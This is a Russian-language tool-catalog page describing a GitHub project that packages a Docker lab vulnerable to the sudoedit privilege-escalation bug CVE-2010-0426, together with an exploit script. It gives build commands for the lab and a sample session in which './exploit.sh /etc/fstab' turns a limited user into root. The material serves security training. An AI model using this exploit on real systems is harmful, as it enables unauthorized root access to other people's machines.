Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 и 1.7.x <= 1.7.2p4: локальное повышение привилегий и уязвимый контейнер | Kitploit
Инструменты/GitHubGitHub/t0kx/privesc-cve-2010-0426
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 и 1.7.x <= 1.7.2p4: локальное повышение привилегий и уязвимый контейнер

Репозиторий
111398 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Sudo 1.6.x<=1.6.9p21 and 1.7.x<=1.7.2p4 Локальное повышение привилегий

Sudo (su "do") позволяет системному администратору предоставлять определённым пользователям (или группам пользователей) возможность выполнять некоторые (или все) команды от имени root, записывая при этом все команды и аргументы.

Уязвимая среда

Чтобы настроить уязвимую среду для тестирования, вам потребуется установленный Docker, и просто выполните следующую команду:

docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

Это запустит интерактивную оболочку с низкими привилегиями пользователя.

Уязвимый код

Ошибка была найдена в sudoedit, который неправильно обрабатывает команду 'sudoedit', что позволяет злоумышленнику заменить реальную команду sudoedit произвольной командой.

Локальные злоумышленники могут использовать эту уязвимость для выполнения произвольных команд от имени пользователя 'root'. Успешная эксплуатация может полностью скомпрометировать уязвимый компьютер.

Эксплуатация

Чтобы атаковать эту цель, просто выполните:

./exploit.sh

Если вы используете этот уязвимый образ, можете просто выполнить:

user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Благодарности

Эта уязвимость была найдена Slouching.

Отказ от ответственности

Эта и предыдущие программы предназначены ТОЛЬКО для образовательных целей. Не используйте их без разрешения. Обычный отказ от ответственности применим, особенно тот факт, что я (t0kx) не несу ответственности за любой ущерб, причинённый прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несёт ответственности за содержание или неправильное использование этих программ или любых их производных. Используя эти программы, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), причинённый использованием этих программ, не является ответственностью t0kx.

Скачать инструмент